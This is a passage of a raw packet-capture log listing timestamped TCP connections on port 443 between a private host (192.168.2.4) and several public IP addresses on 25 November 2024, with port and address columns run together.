                                                    Nov 25, 2024 19:44:45.102802038 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.102827072 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.103020906 CET49800443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.103029966 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.103080988 CET49800443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.154659033 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.154681921 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.154756069 CET49800443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.154764891 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.154812098 CET49800443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.279895067 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.279920101 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.280019999 CET49800443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.280028105 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.280081034 CET49800443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.315722942 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.315745115 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.315830946 CET49800443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.315838099 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.315884113 CET49800443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.341937065 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.341959953 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.342061996 CET49800443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.342067957 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.342117071 CET49800443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.364221096 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.364237070 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.364304066 CET49800443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.364312887 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.364358902 CET49800443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.482619047 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.482667923 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.482711077 CET49800443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.482718945 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.482768059 CET49800443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.501806974 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.501852036 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.501879930 CET49800443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.501887083 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.501912117 CET49800443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.501935959 CET49800443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.523298979 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.523370028 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.523387909 CET49800443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.523443937 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.523485899 CET49800443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.523518085 CET49800443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.540224075 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.540267944 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.540307999 CET49800443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.540313959 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.540347099 CET49800443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.540368080 CET49800443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.544173002 CET49787443192.168.2.4172.67.189.74
                                                    Nov 25, 2024 19:44:45.544195890 CET44349787172.67.189.74192.168.2.4
                                                    Nov 25, 2024 19:44:45.555022001 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.555071115 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.555105925 CET49800443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.555114031 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.555175066 CET49800443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.572933912 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.573020935 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.573179007 CET49800443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.573185921 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.573239088 CET49800443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.578334093 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.578416109 CET49800443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.578422070 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.578475952 CET49800443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.578495026 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.578547001 CET49800443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.578573942 CET49800443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.578582048 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.578603029 CET49800443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.578608036 CET4434980013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.627429962 CET49802443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.627441883 CET4434980213.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.627527952 CET49802443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.629379034 CET49803443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.629399061 CET4434980313.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.629487038 CET49803443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.629662991 CET49802443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.629677057 CET4434980213.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.630140066 CET49803443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.630155087 CET4434980313.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.632231951 CET49804443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.632303953 CET4434980413.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.632390976 CET49804443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.632817984 CET49804443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.632853985 CET4434980413.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.633580923 CET49805443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.633652925 CET4434980513.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.633730888 CET49805443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.634193897 CET49805443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.634224892 CET4434980513.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.634563923 CET49806443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.634587049 CET4434980613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:45.634671926 CET49806443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.634816885 CET49806443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:45.634843111 CET4434980613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.415971994 CET4434980313.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.416558981 CET49803443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.416578054 CET4434980313.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.417191982 CET49803443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.417196989 CET4434980313.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.422195911 CET4434980613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.422529936 CET49806443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.422576904 CET4434980613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.423052073 CET49806443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.423068047 CET4434980613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.424675941 CET4434980513.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.424948931 CET49805443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.425030947 CET4434980513.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.425411940 CET49805443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.425426006 CET4434980513.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.484848022 CET4434980213.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.485300064 CET49802443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.485316038 CET4434980213.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.485833883 CET49802443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.485838890 CET4434980213.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.487896919 CET4434980413.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.488146067 CET49804443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.488178015 CET4434980413.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.488610983 CET49804443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.488621950 CET4434980413.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.867058992 CET4434980613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.867130995 CET4434980613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.867187023 CET49806443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.867378950 CET49806443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.867407084 CET4434980613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.867433071 CET49806443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.867448092 CET4434980613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.870297909 CET49807443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.870372057 CET4434980713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.870505095 CET49807443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.870637894 CET49807443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.870654106 CET4434980713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.874442101 CET4434980513.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.874464989 CET4434980513.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.874512911 CET49805443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.874524117 CET4434980513.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.874568939 CET49805443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.874712944 CET49805443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.874716997 CET4434980513.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.874736071 CET49805443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.874856949 CET4434980513.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.874887943 CET4434980513.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.874922037 CET49805443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.876981020 CET49808443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.877002954 CET4434980813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.877074003 CET49808443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.877203941 CET49808443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.877218962 CET4434980813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.887290955 CET4434980313.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.887370110 CET4434980313.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.887417078 CET49803443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.887511969 CET49803443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.887518883 CET4434980313.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.887528896 CET49803443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.887532949 CET4434980313.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.889682055 CET49809443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.889697075 CET4434980913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.889760017 CET49809443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.889878988 CET49809443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.889888048 CET4434980913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.945278883 CET4434980413.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.945337057 CET4434980413.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.945349932 CET4434980213.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.945374012 CET4434980213.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.945400000 CET49804443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.945419073 CET4434980413.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.945437908 CET49802443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.945446014 CET4434980213.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.945485115 CET49802443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.945611000 CET49804443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.945640087 CET4434980413.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.945663929 CET49804443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.945960999 CET4434980413.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.946084976 CET4434980413.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.946168900 CET49804443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.946867943 CET49802443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.946871996 CET4434980213.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.946908951 CET49802443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.947097063 CET4434980213.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.947137117 CET4434980213.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.947179079 CET49802443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.950934887 CET49810443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.950947046 CET4434981013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.951006889 CET49810443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.951806068 CET49811443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.951813936 CET4434981113.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.951877117 CET49811443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.952004910 CET49810443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.952013016 CET4434981013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:47.952100992 CET49811443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:47.952111959 CET4434981113.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:48.622659922 CET49812443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:48.622704029 CET4434981235.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:48.622781992 CET49812443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:48.623122931 CET49812443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:48.623152018 CET4434981235.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:48.808530092 CET49813443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:48.808593988 CET4434981335.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:48.808674097 CET49813443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:48.808943987 CET49813443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:48.808975935 CET4434981335.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:48.930299044 CET49814443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:48.930335999 CET4434981435.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:48.930409908 CET49814443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:48.930701017 CET49814443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:48.930727959 CET4434981435.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:49.184957027 CET49815443192.168.2.4142.250.181.68
                                                    Nov 25, 2024 19:44:49.184992075 CET44349815142.250.181.68192.168.2.4
                                                    Nov 25, 2024 19:44:49.185059071 CET49815443192.168.2.4142.250.181.68
                                                    Nov 25, 2024 19:44:49.185604095 CET49815443192.168.2.4142.250.181.68
                                                    Nov 25, 2024 19:44:49.185620070 CET44349815142.250.181.68192.168.2.4
                                                    Nov 25, 2024 19:44:49.593090057 CET4434980813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:49.593775988 CET49808443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:49.593792915 CET4434980813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:49.594261885 CET49808443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:49.594266891 CET4434980813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:49.665669918 CET4434980713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:49.666233063 CET49807443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:49.666276932 CET4434980713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:49.666799068 CET49807443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:49.666811943 CET4434980713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:49.733043909 CET4434981013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:49.733576059 CET49810443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:49.733592987 CET4434981013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:49.734198093 CET49810443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:49.734203100 CET4434981013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:49.753206015 CET4434980913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:49.753559113 CET49809443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:49.753573895 CET4434980913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:49.754043102 CET49809443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:49.754050016 CET4434980913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:49.869313002 CET4434981113.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:49.869700909 CET49811443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:49.869720936 CET4434981113.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:49.870242119 CET49811443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:49.870246887 CET4434981113.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:50.030437946 CET4434980813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:50.030503035 CET4434980813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:50.030719995 CET49808443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:50.030747890 CET49808443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:50.030757904 CET4434980813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:50.030769110 CET49808443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:50.030772924 CET4434980813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:50.033782959 CET49816443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:50.033839941 CET4434981613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:50.033917904 CET49816443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:50.034056902 CET49816443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:50.034075022 CET4434981613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:50.092185974 CET4434981235.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:50.092524052 CET49812443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.092571974 CET4434981235.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:50.092924118 CET4434981235.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:50.093349934 CET49812443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.093424082 CET4434981235.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:50.093518019 CET49812443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.135358095 CET4434981235.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:50.136188984 CET49812443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.169014931 CET4434981013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:50.169055939 CET4434981335.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:50.169097900 CET4434981013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:50.169166088 CET49810443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:50.169270992 CET49810443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:50.169276953 CET4434981013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:50.169286013 CET49810443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:50.169289112 CET4434981013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:50.169358015 CET49813443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.169385910 CET4434981335.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:50.171757936 CET49817443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:50.171782970 CET4434981713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:50.171852112 CET49817443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:50.171996117 CET49817443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:50.172008038 CET4434981713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:50.172949076 CET4434981335.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:50.173027039 CET49813443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.173362970 CET49813443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.173464060 CET49813443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.173475027 CET4434981335.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:50.173535109 CET4434981335.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:50.207485914 CET4434980913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:50.207561016 CET4434980913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:50.207684994 CET49809443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:50.207700968 CET49809443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:50.207712889 CET4434980913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:50.207725048 CET49809443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:50.207729101 CET4434980913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:50.209512949 CET49818443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:50.209527969 CET4434981813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:50.209584951 CET49818443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:50.209690094 CET49818443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:50.209702015 CET4434981813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:50.214237928 CET49813443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.214255095 CET4434981335.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:50.235704899 CET4434981435.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:50.235891104 CET49814443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.235908985 CET4434981435.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:50.236887932 CET4434981435.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:50.236968994 CET49814443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.237266064 CET49814443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.237334013 CET4434981435.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:50.237351894 CET49814443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.261087894 CET49813443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.279365063 CET4434981435.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:50.284122944 CET4434980713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:50.284276009 CET4434980713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:50.284389019 CET49807443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:50.284435987 CET49807443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:50.284435987 CET49807443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:50.284466982 CET4434980713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:50.284507036 CET4434980713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:50.286350012 CET49819443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:50.286361933 CET4434981913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:50.286448002 CET49819443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:50.286556959 CET49819443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:50.286569118 CET4434981913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:50.292354107 CET49814443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.292373896 CET4434981435.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:50.322117090 CET4434981113.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:50.322318077 CET4434981113.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:50.322540045 CET49811443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:50.322587967 CET49811443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:50.322592974 CET4434981113.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:50.322602987 CET49811443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:50.322606087 CET4434981113.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:50.324475050 CET49820443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:50.324507952 CET4434982013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:50.325330973 CET49820443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:50.325422049 CET49820443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:50.325438976 CET4434982013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:50.339232922 CET49814443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.596430063 CET4434981235.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:50.596673012 CET4434981235.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:50.596738100 CET49812443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.596776962 CET49812443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.596803904 CET4434981235.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:50.596847057 CET49812443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.596868992 CET49812443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.597611904 CET49821443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.597646952 CET4434982135.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:50.597712994 CET49821443192.168.2.435.190.80.1
